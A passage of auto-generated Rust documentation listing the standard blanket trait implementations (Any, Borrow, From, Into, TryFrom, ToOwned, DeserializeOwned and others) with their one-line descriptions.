
Auto Trait Implementations§

Blanket Implementations§

Source§

impl<T> Any for T
where T: 'static + ?Sized,

Source§

fn type_id(&self) -> TypeId

Gets the TypeId of self. Read more
Source§

impl<T> Borrow<T> for T
where T: ?Sized,

Source§

fn borrow(&self) -> &T

Immutably borrows from an owned value. Read more
Source§

impl<T> BorrowMut<T> for T
where T: ?Sized,

Source§

fn borrow_mut(&mut self) -> &mut T

Mutably borrows from an owned value. Read more
Source§

impl<T> CloneToUninit for T
where T: Clone,

Source§

unsafe fn clone_to_uninit(&self, dest: *mut u8)

🔬This is a nightly-only experimental API. (clone_to_uninit)
Performs copy-assignment from self to dest. Read more
Source§

impl<T> From<T> for T

Source§

fn from(t: T) -> T

Returns the argument unchanged.

Source§

impl<T, U> Into<U> for T
where U: From<T>,

Source§

fn into(self) -> U

Calls U::from(self).

That is, this conversion is whatever the implementation of From<T> for U chooses to do.

Source§

impl<T> ToOwned for T
where T: Clone,

Source§

type Owned = T

The resulting type after obtaining ownership.
Source§

fn to_owned(&self) -> T

Creates owned data from borrowed data, usually by cloning. Read more
Source§

fn clone_into(&self, target: &mut T)

Uses borrowed data to replace owned data, usually by cloning. Read more
Source§

impl<T, U> TryFrom<U> for T
where U: Into<T>,

Source§

type Error = Infallible

The type returned in the event of a conversion error.
Source§

fn try_from(value: U) -> Result<T, <T as TryFrom<U>>::Error>

Performs the conversion.
Source§

impl<T, U> TryInto<U> for T
where U: TryFrom<T>,

Source§

type Error = <U as TryFrom<T>>::Error

The type returned in the event of a conversion error.
Source§

fn try_into(self) -> Result<U, <U as TryFrom<T>>::Error>

Performs the conversion.
Source§

impl<T> DeserializeOwned for T
where T: for<'de> Deserialize<'de>,